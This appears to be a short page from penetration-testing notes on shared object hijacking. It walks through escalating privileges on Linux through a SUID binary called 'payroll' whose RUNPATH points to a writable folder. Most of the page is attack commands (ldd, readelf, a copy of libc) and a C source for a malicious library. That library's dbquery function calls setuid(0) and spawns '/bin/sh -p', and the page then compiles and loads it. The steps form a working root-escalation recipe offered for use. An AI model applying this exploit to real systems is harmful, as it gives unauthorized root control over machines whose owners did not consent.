Shared Object Hijacking

Shared Object Hijacking is a technique where a binary loads a malicious shared object instead of the legitimate one due to misconfigured load paths like RUNPATH.

Steps to Exploit:

Identify a SUID binary:

ls -la payroll

Check its linked libraries using ldd:

ldd payroll

Look for non-standard paths (e.g., /development) and check if the folder is writable:

ls -lad /development

Verify the RUNPATH using readelf:

readelf -d payroll | grep PATH

Check for missing function symbols when copying a standard library:

cp /lib/x86_64-linux-gnu/libc.so.6 /development/libshared.so
./payroll

Create a malicious shared object with the missing function (dbquery):

// src.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void dbquery() {
    printf("Malicious library loaded\n");
    setuid(0);
    system("/bin/sh -p");
}

Compile the malicious library:

gcc src.c -fPIC -shared -o /development/libshared.so

Execute the vulnerable binary:

./payroll

PreviousKubernetes (K8s)NextPython library hijacking

Last updated 8 months ago